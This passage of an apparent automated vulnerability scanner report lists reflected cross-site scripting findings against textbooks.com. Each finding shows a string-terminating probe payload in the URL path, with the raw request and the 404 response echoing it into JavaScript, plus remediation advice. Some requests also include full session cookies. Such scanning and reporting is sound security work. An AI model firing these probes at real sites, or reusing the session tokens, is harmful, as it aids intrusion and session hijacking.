sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-Contact.php3be2e';1c6a9d6e709'

</script>
...[SNIP]...

1.39. http://www.textbooks.com/CustServ-FAQ.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-FAQ.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50160'%3bc1fcfb98d9a was submitted in the REST URL parameter 1. This input was echoed as 50160';c1fcfb98d9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-FAQ.php50160'%3bc1fcfb98d9a HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3632
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:20 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-FAQ.php50160';c1fcfb98d9a'

</script>
...[SNIP]...

1.40. http://www.textbooks.com/CustServ-Home.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-Home.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dacf6'%3b11fef22db6a was submitted in the REST URL parameter 1. This input was echoed as dacf6';11fef22db6a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-Home.phpdacf6'%3b11fef22db6a HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:11 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-Home.phpdacf6';11fef22db6a'

</script>
...[SNIP]...

1.41. http://www.textbooks.com/CustServ-HowToShop.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-HowToShop.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ea9b'%3ba03b8f867cb was submitted in the REST URL parameter 1. This input was echoed as 7ea9b';a03b8f867cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-HowToShop.php7ea9b'%3ba03b8f867cb HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3638
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:35 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
bj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-HowToShop.php7ea9b';a03b8f867cb'

</script>
...[SNIP]...

1.42. http://www.textbooks.com/CustServ-Privacy.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-Privacy.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e83e'%3b607330bdcaa was submitted in the REST URL parameter 1. This input was echoed as 9e83e';607330bdcaa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-Privacy.php9e83e'%3b607330bdcaa HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3636
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:33 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-Privacy.php9e83e';607330bdcaa'

</script>
...[SNIP]...

1.43. http://www.textbooks.com/CustServ-ShippingPolicy.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-ShippingPolicy.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82861'%3b50f147614bc was submitted in the REST URL parameter 1. This input was echoed as 82861';50f147614bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-ShippingPolicy.php82861'%3b50f147614bc HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3643
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:18 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-ShippingPolicy.php82861';50f147614bc'

</script>
...[SNIP]...

1.44. http://www.textbooks.com/CustServ-Terms.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-Terms.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f540'%3bfe05e082287 was submitted in the REST URL parameter 1. This input was echoed as 6f540';fe05e082287 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-Terms.php6f540'%3bfe05e082287 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:35 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-Terms.php6f540';fe05e082287'

</script>
...[SNIP]...

1.45. http://www.textbooks.com/CustServ-WhyTB.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /CustServ-WhyTB.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f32f'%3bba57205973 was submitted in the REST URL parameter 1. This input was echoed as 8f32f';ba57205973 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CustServ-WhyTB.php8f32f'%3bba57205973 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:17 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/CustServ-WhyTB.php8f32f';ba57205973'

</script>
...[SNIP]...

1.46. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ffa7'%3b0b9bc122078 was submitted in the REST URL parameter 1. This input was echoed as 1ffa7';0b9bc122078 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ISBN1ffa7'%3b0b9bc122078/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3686
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:56 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
earchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/ISBN1ffa7';0b9bc122078/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php'

</script>
...[SNIP]...

1.47. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef3ef'%3b15bc4ae2947 was submitted in the REST URL parameter 4. This input was echoed as ef3ef';15bc4ae2947 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ISBN/9780805853223/Peter-Vorderer/ef3ef'%3b15bc4ae2947 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3650
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:56 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
t.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/ISBN/9780805853223/Peter-Vorderer/ef3ef';15bc4ae2947'

</script>
...[SNIP]...

1.48. http://www.textbooks.com/Search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Search.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71133'%3b1e739ace45d was submitted in the REST URL parameter 1. This input was echoed as 71133';1e739ace45d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Search.php71133'%3b1e739ace45d HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:37 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Search.php71133';1e739ace45d'

</script>
...[SNIP]...

1.49. http://www.textbooks.com/affiliates.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /affiliates.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2495c'%3bea95fbe83be was submitted in the REST URL parameter 1. This input was echoed as 2495c';ea95fbe83be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliates.php2495c'%3bea95fbe83be HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3630
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:27 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/affiliates.php2495c';ea95fbe83be'

</script>
...[SNIP]...

1.50. http://www.textbooks.com/buy-textbooks.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /buy-textbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7230b'%3bea4586f4bd2 was submitted in the REST URL parameter 1. This input was echoed as 7230b';ea4586f4bd2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /buy-textbooks.php7230b'%3bea4586f4bd2 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
